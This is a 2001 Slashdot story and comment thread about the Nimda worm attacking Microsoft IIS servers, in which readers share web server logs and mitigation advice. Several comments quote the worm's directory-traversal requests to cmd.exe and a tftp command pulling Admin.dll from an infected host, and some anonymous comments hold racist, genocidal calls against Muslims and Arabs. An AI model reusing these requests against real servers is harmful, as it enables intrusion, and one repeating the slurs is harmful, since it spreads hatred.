×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

New (More) Annoying Microsoft Worm Hits Net

CmdrTaco posted more than 12 years ago | from the what-a-pain-in-the-arse dept.

Bug 1163

A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J : It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

1163 comments

fwxpp (-1, Offtopic)

Turd Fergus0n (521940) | more than 12 years ago | (#2314665)

first windows xp post!

Oh no! XP has raw sockets!!! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314728)

The sky is falling! The sky is falling!

This overreaction brought to you by Gibson Research Corporation [grc.com].

Re:Oh no! XP has raw sockets!!! (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2314754)

Here, have some goatsex [goatse.cx] to go along with those raw sockets.

fp (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314667)

fp

I would (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314668)

I would forward this to the Help Desk people here, but then they'd know I was reading /.

Is this just the old Unicode exploit? (4, Interesting)

MeowMeow Jones (233640) | more than 12 years ago | (#2314670)

Or is it something new?

Looks like an exploit that's been around for a while (way before CR)

Bleah...my firewall logs all of this... (4, Informative)

Dimensio (311070) | more than 12 years ago | (#2314671)

And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.

It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.

Re:Bleah...my firewall logs all of this... (2, Interesting)

Anonymous Coward | more than 12 years ago | (#2314798)

Be glad they are sitting on their hands. In my area, their way of dealing with Code Red was to disable ALL port 80 requests -- which is really a dumb way to handle it.

Mail servers down (1)

Vamphyri (26309) | more than 12 years ago | (#2314672)

My mail server is down already. Thanks for this new virus in the wake of such a tragedy.

Re:Mail servers down (3, Offtopic)

Swordfish (86310) | more than 12 years ago | (#2314773)

It seems to me that it started at approximately 08:42 on Tuesday morning. I wonder what this means?!! I suspect this is not a coincidence.

It has a very high probability of /16 hits as well as /8 hits.

It's using about 50% of my modem bandwidth with about 20 IP addresses with port 80 active. It's so bad, I closed down most of my ports 80.

uh...just patch (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314673)

No need to run terrified through the streets like CmdrTaco yelling "Shut down your Windows boxes! I just pissed my pants!" Just patch your damn systems. If only Linux were popular enough to inspire more worms...

Is there a patch out yet? (2)

Svartalf (2997) | more than 12 years ago | (#2314740)

If they're using all-new exploits, it may be that there ISN'T a patch to apply. Furthermore, getting Windows users to apply patches is spotty at best- users often don't even realize that they're running a web server on their box.

408 worm too? (5, Informative)

libertynews (304820) | more than 12 years ago | (#2314675)

I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.

I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.

Brian

Re:408 worm too? (2)

Tim Doran (910) | more than 12 years ago | (#2314741)

Wow - I opened one of the IP's that's hit my box and saw the same thing - Fuck USA Government, Fuck PoisonBox' I'm in the 24.156 range (Rogers@Home in Ontario...)

Wrong name (4, Informative)

platinum (20276) | more than 12 years ago | (#2314676)

The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.

Re:Wrong name (5, Funny)

garcia (6573) | more than 12 years ago | (#2314748)

it originally started in just the 63.174 for me. Now it is hitting me from all over the place. It is really nasty b/c of the number of requests that each machine sends out.

I was surfing some porn sites this morning and they seemed horribly affected (none of the images would load and they were slow as hell).

ugh. Just when you thought it was safe to disable "assholes_log".

Re:Wrong name (-1, Troll)

zpengo (99887) | more than 12 years ago | (#2314840)

I was surfing some porn sites this morning and they seemed horribly affected... '

"Horribly affected"? Sounds like Stileproject!

Re:Wrong name (5, Informative)

platinum (20276) | more than 12 years ago | (#2314749)

<replying to myself>
If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a .wav content type. This file (using strings) appears to contain numerous registry entries plus all the strings used to find and infect other servers.

Re:Wrong name (2)

zpengo (99887) | more than 12 years ago | (#2314859)

It appears to be attempting to find rooter servers, for what purpose I can only imagine.

Propagation of the species?

It's interesting how worms, viruses, etc., take after biological tendencies, and almost have to be treated the same way to get rid of them: Quarantine, vaccination, precautionary measures, etc.

It's a shame there are no drugs for this one yet.

here's more output (4, Informative)

TheGratefulNet (143330) | more than 12 years ago | (#2314680)

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.

Re:here's more output (4, Informative)

cphipps (103142) | more than 12 years ago | (#2314837)

...including what looks like an attempt to exploit boxes still rooted by Code Red

Assuming that refers to this:

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

then that's an exploit for Code Red II [f-secure.com] infected machines, not the original Code Red.

what part of the registry is mailed? (1)

flok (24996) | more than 12 years ago | (#2314681)

I wonder what part of the registry is mailed. Passwords+usernames of outlook? Or are all of these in pwl-files these days?

gpl (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314687)

the gpl sucks, it lets people steal your code and say they made it

yup! (2)

macpeep (36699) | more than 12 years ago | (#2314688)

Yeah.. While I'm on Win2K and running a web server, it would never occur to me to run IIS. My logs are totally filled up with traces of this new worm. The logs also include lines such as this (IP censored).

GET /scripts/root.exe?/c+tftp%20-i%20212.163.x.x%20GET %20Admin.dll%20Admin.dll 212.163.x.x

Interesting..

On the upside, I haven't had a single hit by Code Red in the past hour or so! Let's hope this one is nasty enough to get the people to finally shut down / fix their boxes!

Re:yup! (1)

Dimensio (311070) | more than 12 years ago | (#2314706)

Are you running a webserver that is getting these requests, or is it just a firewall that logs the entire packet content?

I'm using IPChains under Linux and I don't get much packet information (perhaps I could set up a more verbose logging, I'm a bit inexperienced and my first priority was shutting out all unwanted traffic) other than the originating IP, the outgoing port and the attempted incoming port when the packet was dropped.

Re:yup! (1)

xanadu-xtroot.com (450073) | more than 12 years ago | (#2314786)

I don't know about you or him, but:

I turned Apache on at home (disabling everthing but the ability to serve index.html). I see a ton of Code-Red hits all the time. Can iptables do this? I'm not totallyu sure. I see port 80 hits everytime a Code-Red comes in (I allow the packets, but I them still).
Just a thought...

Re:yup! (1)

Dog and Pony (521538) | more than 12 years ago | (#2314776)

Exactly. :) I'm on W2k partly, also, and I wouldn't either. Sorry for the me-too post, but just because you are sorry enough to run windows (like me), there is no reason to be stupid on top of that... like running IIS. :)

What's the problem? (5, Funny)

niekze (96793) | more than 12 years ago | (#2314689)

Why won't someone port these to linux? Microsoft Operating Systems seem to have a monopoly in this field. For now, if you read this in a *nix, just portscan your netmask and a few others and try a few old wu-ftp exploits.

"You have new mail, you open it. Your server begins port scanning every box on the internet. Do the server's mind? Of course not, they have nothing better to do." - New Microsoft Ad?

Re:What's the problem? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314845)

Yet another argument in favor of open source...

If the code was open, we'd be able to enjoy the same viruses that Windows users get!

Damn proprietary viruses! Damn them all to hell!

Re:What's the problem? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314850)

Well, try with Wine

SCNR

küsschen

early post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314691)

this early post is for the eradication and ethnic cleansing of sand niggers everywhere

Non-windows Servers (2)

under_score (65824) | more than 12 years ago | (#2314693)

This kinda stuff isn't nice for unix servers either. I have both FreeBSD with Apache and Linux with Tomcat doing stuff and every time a worm like this comes along, my stuff drags to a halt and occaisionally crashes (if my app server is set up in a fragile way). At least I won't be perpetuating this one though.

Only now? (1)

cphipps (103142) | more than 12 years ago | (#2314694)

Turn off your windows servers

Well if you're still vulnerable to those exploits then you should've turned them off months ago...

The old Code Red Patches don't work? (1)

Uttles (324447) | more than 12 years ago | (#2314695)

So the patches MS sent out didn't stop this new one? I thought they said they had solved that type of problem... I just love MS.

Re:The old Code Red Patches don't work? (3, Insightful)

Dimensio (311070) | more than 12 years ago | (#2314737)

The new patches may well stop this one. No one implements the patches, which is why Code Red 2 packets are still flying all over every subnet on @Home.

Microsoft may be partly to blame, but it's not for being irresponsible in patching these issues; it's for allowing idiots who don't know how to properly administrate and who will never do security checks to easily run MS servers -- often without realising that the server exists.

Re:The old Code Red Patches don't work? (1)

Uttles (324447) | more than 12 years ago | (#2314757)

You're right about that, people don't administrate well.

As opposed to the Linux patches (0)

Anonymous Coward | more than 12 years ago | (#2314766)

Which fix all future bugs before they happen. Hello?

With 1,000 easy reasons to not use MS, you decide to MAKE ONE UP? Sheesh....

Turn them off??? (0)

Anonymous Coward | more than 12 years ago | (#2314696)

Right. Corporate won't mind. I'll just pull the plug.

Corporate ought to be securing the box better... (3)

Svartalf (2997) | more than 12 years ago | (#2314772)

If there's a patch, they should have applied it (If it breaks things, well, perhaps Windows isn't something they should be using...). If the patch doesn't fix this, they should be screaming at MS. If this is a new exploit maybe they should be screaming at MS and checking into a new system design...

This could explain why I can't reach my machine.. (1, Troll)

Gambit Thirty-Two (4665) | more than 12 years ago | (#2314698)

If its scanning subnets, this could very well explain why I cant reach my machine at home (Roadrunner).

Its probably generation a sh*tload of traffic.

Can anyone on 24.x.x.x verify?

Re:This could explain why I can't reach my machine (1)

nitemayr (309702) | more than 12 years ago | (#2314755)

Yeah, just started on 24 /8 this morning at exactly 9:30am est

Re:This could explain why I can't reach my machine (1)

xZAQx (472674) | more than 12 years ago | (#2314784)

Hey I'm on 24.154 and I didn't notice any latency when SSHing in to home. (Coming from a 208 at work, btw)

Re:This could explain why I can't reach my machine (1)

headonfire (160408) | more than 12 years ago | (#2314787)

I'm on a cable network, 24.x.x.x...
My logs are getting swamped, with as many as 55 hits from a single IP in minutes.

"File does not exist: /usr/local/httpd/htdocs/scripts/..Á{../winnt/syste m32/cmd.exe

File does not exist: /usr/local/httpd/htdocs/MSADC/root.exe

File does not exist: /usr/local/httpd/htdocs/msadc/..%5c../..%5c../..%5 c/..Á{../..Á{../..Á{../winnt/system32/cmd.exe

running a search script on "cmd.exe" in my apache error.log tells me:

ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '11'
ip is 24.252.x attempts is '11'
ip is 24.69.x attempts is '11'
ip is 24.232.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.124.x attempts is '9'
ip is 24.162.x attempts is '9'
ip is 24.124.x attempts is '15'
ip is 24.93.x attempts is '11'
ip is 24.124.x attempts is '36'
ip is 216.198.x attempts is '1'
ip is 24.124.x attempts is '44'
ip is 24.124.x attempts is '1'
ip is 24.16.x attempts is '1'
ip is 24.124.x attempts is '2'
ip is 24.37.x attempts is '2'
ip is 24.164.x attempts is '5'
ip is 24.0.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.1.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.161.x attempts is '11'
ip is 24.6.x attempts is '11'
ip is 24.124.x attempts is '55'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '33'

This is just from this morning, starting in the wee hours and still continuing as I write.

My snort box is picking up something too... (1)

jermz (6352) | more than 12 years ago | (#2314699)

Snort has been going nuts this morning. I am getting about the same results. Although, in my case, the attacks are coming from 63.x.x.x, which is the same /8 as I am on.

From here, it looks like a variation on Code Red. Should be an interesting morning.

Jeremy

This isn't a worm... (0)

Anonymous Coward | more than 12 years ago | (#2314700)

This is just some script kiddie trying to exploit the holes that Code Red previously opened up. Unless you see it coming from different IP subnets, the likelyhood of this attack being a worm is nearly zero.

AC

Re:This isn't a worm... (1)

ergo98 (9391) | more than 12 years ago | (#2314793)

When it finds a hole in a machine it replicates itself to said machine and launches more attacks from the new victim, hence it's a worm.

yeah it sucks (2)

Dr. Awktagon (233360) | more than 12 years ago | (#2314705)

I noticed that this morning on my various IDS's and was going to post on OT message in another story to see if it was affecting many people.

I get them from inside the local net.

I can't believe this stupid Code Red crap is still going on. I've gotten used to the constant hits. And now am I going to have to get used to this junk?? Argh! I'm just firewalling them off as they hit.

What's this one trying to exploit? (1)

batkiwi (137781) | more than 12 years ago | (#2314710)

Looking at the code red virus it was obvious it was going for a hole in the indexing server.

What's this one going after?
Just IIS web server itself?

It'd be almost amusing if this was just some script kiddie with a bunch of zombies trying to cause a virus "scare" (ie hitting a bunch of boxes with a peculiar looking URL, making everyone think it's a worm).

I'm not saying it's not a virus, just it would be amusing...

Yep - I'm being hit too. (2)

Tim Doran (910) | more than 12 years ago | (#2314711)

1300 hits so far. Each infected machine seems to be making a LOT of attempts.

Here we go again...

Outlook Express 6.0 can prevent spread (5, Informative)

savaget (26702) | more than 12 years ago | (#2314713)

With the new Outlook Express 6.0, you can now prevent the user from opening any attchments.


Here is how it is done:


Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"

Re:Outlook Express 6.0 can prevent spread (4, Interesting)

Dog and Pony (521538) | more than 12 years ago | (#2314802)

Yeah. If you turn that on, it will warn you that .txt files or .gif files are potentially viral, while letting through .doc and other formats that are "known" (lmao) to be safe - or rather, MS formats.

Actually, it is such a stupid check, it almost makes things worse instead.

DoS.Storm Worm (1)

jazon (4995) | more than 12 years ago | (#2314715)

The attacks look a lot like the DoS.Storm worm that appeared on the scene June 2001. Either it's a new outbreak of DoS.Storm, or a modified version

Symantic has info on DoS.Storm here [symantec.com]
SANS incidents.org has more details here [incidents.org]

seeing this as well (1)

Emrys (7536) | more than 12 years ago | (#2314719)

All of the hits I'm getting are coming from 64.x.x.x machines. Most are coming from 64.90.x.x. My own subnet falls within 64.90.x.x, so maybe the worm attacks near machines first. Of course, /. is also inside 64.x.x.x...

Re:seeing this as well (1)

marnanel (98063) | more than 12 years ago | (#2314818)

Yes, similarly here. I've heard it suggested that this is some form of the Code Blue [datafellows.com] worm: according to Datafellows's website, CB attacks random IPs half the time, and IPs in the same /16 the other half.

Destroy Islam. Exterminate All Muslims. Destroy. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314720)

Our tormented dead scream out for vengeance:
  1. Kill all Muslims.
  2. Kill all Mohammedans.
  3. Kill all Arabs.
  4. Kill all Towel Heads.
  5. Kill ll Camel Jockeys.
  6. Kill all Dune Coons.
  7. Kill all Sand Niggers.
  8. Kill all Islam.
  9. Nuke their countries to hell.
  10. Nuke them again.
  11. Death to Islam.

I piss on Mecca. I wipe my ass with the Koran. I spit upon Mohammed.

Re:Destroy Islam. Exterminate All Muslims. Destroy (0, Offtopic)

HermanBupkis (442793) | more than 12 years ago | (#2314827)

Don't be a dink, man.

We are all upset about what the Terrorists did. But you don't have to be a wiener to a bunch of innocent people.

Me to... (2)

JeffL (5070) | more than 12 years ago | (#2314724)

[checks logs]

I am seeing these hits too. Since 18/Sep/2001:07:27:25 -0600 (it is now 09:16) I have been hit by 120 different machines. 105 of them are on my class B, 128.138, 14 more just start with 128, and only one is from a totally different address.

Perhaps I should contact the admins at my site who are in charge of the offending machines.

Worm roll-up? (2, Interesting)

dave-fu (86011) | more than 12 years ago | (#2314725)

I see it looking for the exploit Code Red used, trying out MSADC and a directory traversal exploit.
My money's on the Code Red worm being retrofit yet again to try and execute a few more tired old exploits. Which is to say hopefully Hotmail and Windows Update won't get rooted again.
Haven't heard anything about it on Bugtraq yet; haven't checked Incidents (securityfocus.com isn't chugging along so speedily).
It'll be interesting to see how many boxes this roots out in the light of increased press coverage of Code Red and MS's spate of security-minded tools out there. Or: how good do people feel about that leaky dam now that they've stuck their thumb in the hole labelled "Code Red"?

Been hit many many times already (2, Informative)

strags (209606) | more than 12 years ago | (#2314729)

Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.

63.73.31.242 just hit me 16 times.

Going to http://63.73.31.242 indicates:
"National Aerospace Documentation Home Page"
and attempts to launch a "readme.exe" executable immediately.

Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.

So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.

Re:Been hit many many times already (1)

Dimensio (311070) | more than 12 years ago | (#2314800)

I checked those links from a computer running IE6 (I'm at work).

IE reported that I had clicked a multimedia link after loading the page (er...no) and asked if I wanted to run the media in IE (it didn't give me an option to just not run it at all). When I said no, it loaded Media Player which then informed me that the selected media was invalid.

Weird. They also both opened up the readme.eml pages in another window.

Too Slow (3, Informative)

xanadu-xtroot.com (450073) | more than 12 years ago | (#2314731)

Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:

~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~

OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).

I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
(or at least, apply the damn patch already)

woah (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314732)

All these weird entries in my server log are making me horny! I think i'll go give myself another blowjob.

Yep, we're seeing them here too. (5, Informative)

Olinator (412652) | more than 12 years ago | (#2314734)

David Korpiewski, our Windoze martyr, is hard at work on this one (I Don't Do Windows:-), and had this to say:

Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml", "readme.eml", etc.

A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug [guninski.com] out for IE5 that will auto execute any given .eml file.

Re:Yep, we're seeing them here too. (1)

gwizah (236406) | more than 12 years ago | (#2314815)

Wait, An MS-bug that auto-executes a file??.

Where have we seen this before? Oh yeah! In pratically every MS product. When is microsoft going to learn to isolate .exe commands from joe Q. Public?

Damn...just submitted this story... (3, Informative)

ergo98 (9391) | more than 12 years ago | (#2314743)

Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.



2001-09-18 15:10:19 *.*.*.* GET /scripts/root.exe 404 701 72 0 - -

2001-09-18 15:10:19 *.*.*.* GET /MSADC/root.exe 404 701 70 0 - -

2001-09-18 15:10:19 *.*.*.* GET /c/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /d/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 10 - -

2001-09-18 15:10:19 *.*.*.* GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 10 - -

2001-09-18 15:10:20 *.*.*.* GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 0 - -

2001-09-18 15:10:20 *.*.*.* GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../ winnt/system32/cmd.exe 404 701 145 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..Á../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/winnt/system32/cmd.exe 404 701 97 10 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/../../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..\../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 98 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 100 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%2f../winnt/system32/cmd.exe 404 701 96 0 - -

Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).


More Info (5, Informative)

Nater (15229) | more than 12 years ago | (#2314744)

When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.

I'll take a look at Admin.dll later today.

Sue them (1)

slimme (84675) | more than 12 years ago | (#2314747)

If those boxes cause you a problem (lost time, lost work, lost bandwith, distress, ...) you have every right to sue the operators of these (unattended?) boxes.

You might also ask their ISP's to shut down their internet connection for these reasons. If they dont comply sue them.

You do live in the U.SA. don't you?

exactly 1 week after WTC attack (9 AM EST) (1)

Orp (6583) | more than 12 years ago | (#2314759)

Is it just a coincidence? I doubt it.

I noticed the activity light on my cable modem (charter communications @home) was on constantly - ran tcpdump and it's all these "who has x? tell y" arp queries (nameserver lookups), just like with code red.

Leigh Orf

I've been getting hits since last night... (1)

kypper (446750) | more than 12 years ago | (#2314762)

my firewall ain't pleased.

I didn't think of Code Red stuff since my mind's been on the WTC stuff and potential war.

Isn't it interesting that everything nasty happens in just a short period? At least I know why my net has been crawling so badly.

slashdot community (1)

mach-5 (73873) | more than 12 years ago | (#2314769)

It is really cool to see everyone giving their experiences and trying to pull together to figure this one out. It won't be long until a slashdotter gets to the bottom of this one.

Re:slashdot community (2)

Rackemup (160230) | more than 12 years ago | (#2314826)

It is pretty cool eh? So many geeks to chip in with knowledge and experience...

I wonder if our servers are being scanned...

Mail sent to me. (1)

tino_sup (460223) | more than 12 years ago | (#2314770)

I received mail with a readme.exe and txt.exe attachments.

The sending address was from jleo@arcgny.org with the subject line:

ware\Microsoft\WindoJb4 "supertrak66bclass11_28hlaconsoleapplication2data consoleapplication1consoleapplication1supertrak66b servicesuntitled - 1ultrabudgetciscostuffconsoleapplication2pitou-0co nsoleapplication2_debug

.Searching for the address brought up the 2600 website with a Support Message for the WTC.

A quick traceroute returned:
16 172 ms 187 ms 125 ms adsl-65-66-34-57.dsl.stlsmo.swbell.net [65.66.34.57]

A little more info found returned:

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:

I have yet to scope the file.

Bin Laden again (0)

Anonymous Coward | more than 12 years ago | (#2314779)

Gues he has it in for the U S og A =)

Code Blue like? (1)

Erasei (315737) | more than 12 years ago | (#2314782)

Symantec has an article [symantec.com] on Code Blue. This might not be it.. but it's a lot like it from what I can tell.

Spread analysis (1)

Ex Machina (10710) | more than 12 years ago | (#2314788)

first hit: 5:25:07 GMT

grep winnt /var/log/apache/error.log | cut -d " " -f 8 | cut -d ] -f 1 | uniq | wc -l
27 hosts

All the hits are from my class A

hrmmmm..... (0)

Anonymous Coward | more than 12 years ago | (#2314791)

looks like I got a few this morning. all from 65.102.x.x

scanning (1)

defy (159002) | more than 12 years ago | (#2314792)

Do all these boxes doing the scanning seem to be patched from the exploit themsevles?

Dumping Files (1)

jducoeur (134305) | more than 12 years ago | (#2314796)

Stupid thing also dumps files all over the network. It got into our net about two hours ago, and began to spew ".eml" files all over the place, on every machine on the subnet, one in every subdirectory it could find. (Where is the name of some real file on the system.) The contents are a readme.exe file, which is MIME-encoded to say that it's a WAV file. My guess is that, if you click on the .eml file, it launches things anew...

We've been seeing it too (2, Informative)

Chang (2714) | more than 12 years ago | (#2314797)

Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (ISS Unicode attack) at our location since about 9:00am EDT.

We are seeing very heavy activity (not as bad as Code Red) since then.

New Virus (2, Informative)

Sternn (143817) | more than 12 years ago | (#2314809)

I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if your not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.

-S

Mystery file upon accessing attacking site (1)

jermz (6352) | more than 12 years ago | (#2314811)

When trying to access a couple of the attacking sites, I get a download of a file called wbk832.tmp and a second IE window opens with the URL of mhtml:http://xxx.xxx.xxx.xxx/readme.eml

This looks like a bad one. Anyone have any ideas?

From ntbugtraq... (0)

Anonymous Coward | more than 12 years ago | (#2314812)

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Aargh! (1)

JimPooley (150814) | more than 12 years ago | (#2314817)

Just started getting these in the last two hours, all from 195.x.x.x addresses.
OK. So I'm running Apache, which shrugs them off, but they're wasting our crap bandwidth and stuffing our web server logs!
I tried looking at the websites - many of them had some kind of default screen, indicating an unused IIS installed by default/mistake.

Apache commands (2, Informative)

man_ls (248470) | more than 12 years ago | (#2314823)

apache_1adminconfig
fontsmrtns2
apacheroutedelete
hpfontsmod_perl-1
gettime
big-sister-0
apachejmeter_1
pdfwritr
apache-contrib1lo66293
routedelete
autoexec
apachejmeter_1mod_phantomimap

No ideas...got me what it's doing.

I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.

I've also gotten the snippits of the registry:
"ware\Microsoft\Windo,b4 pull123"

Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.

Figured that's what it was. (2)

Perianwyr Stormcrow (157913) | more than 12 years ago | (#2314831)

Aside from the Code Red usual suspects who've been hitting my server, I've seen a shitload of these, too.

It doesn't even have a cool name yet. feh.

Maybe a Box collection for mas DDoS on Afganistan? (0, Flamebait)

Quazion (237706) | more than 12 years ago | (#2314832)

I heard some Hacker groups where planning cyberwar against Afganistan and Iraq, then they will be needing loads of machines.

Dont know but this could be related.

Quazion.

eh? (2)

